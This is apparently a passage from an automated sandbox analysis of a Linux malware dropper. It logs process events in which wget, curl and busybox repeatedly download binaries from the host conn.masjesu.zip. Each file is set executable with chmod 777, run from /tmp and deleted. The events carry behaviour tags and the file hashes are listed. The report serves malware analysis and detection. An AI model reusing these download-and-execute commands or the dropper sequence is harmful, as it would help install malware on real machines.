  - PID 968 /bin/rm: rm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3 [System Network Configuration Discovery]
  - PID 969 /usr/bin/wget: wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [System Network Configuration Discovery]
  - PID 970 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 972 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [System Network Configuration Discovery]
  - PID 973 /bin/chmod: chmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [File and Directory Permissions Modification]
  - PID 974 /tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc: ./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc [Executes dropped EXE]
  - PID 975 /bin/rm: rm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc
  - PID 976 /usr/bin/wget: wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [System Network Configuration Discovery]
  - PID 977 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 979 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO
  - PID 980 /bin/chmod: chmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [File and Directory Permissions Modification]
  - PID 981 /tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO: ./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO [Executes dropped EXE]
  - PID 982 /bin/rm: rm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO
  - PID 983 /usr/bin/wget: wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05
  - PID 984 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [Reads runtime system information; Writes file to tmp directory]
  - PID 986 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05
  - PID 987 /bin/chmod: chmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [File and Directory Permissions Modification]
  - PID 988 /tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05: ./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05 [Executes dropped EXE]
  - PID 989 /bin/rm: rm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05
  - PID 990 /usr/bin/wget: wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [System Network Configuration Discovery]
  - PID 991 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 993 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [System Network Configuration Discovery]
  - PID 994 /bin/chmod: chmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [File and Directory Permissions Modification]
  - PID 995 /tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I: ./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I [Executes dropped EXE]
  - PID 996 /bin/rm: rm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I
  - PID 997 /usr/bin/wget: wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [System Network Configuration Discovery]
  - PID 998 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 1000 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u
  - PID 1001 /bin/chmod: chmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [File and Directory Permissions Modification]
  - PID 1002 /tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u: ./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u [Executes dropped EXE]
  - PID 1003 /bin/rm: rm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u
  - PID 1004 /usr/bin/wget: wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [System Network Configuration Discovery]
  - PID 1005 /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - PID 1007 /bin/busybox: busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw
  - PID 1008 /bin/chmod: chmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [File and Directory Permissions Modification]
  - PID 1009 /tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw: ./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw [Executes dropped EXE]
  - PID 1010 /bin/rm: rm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97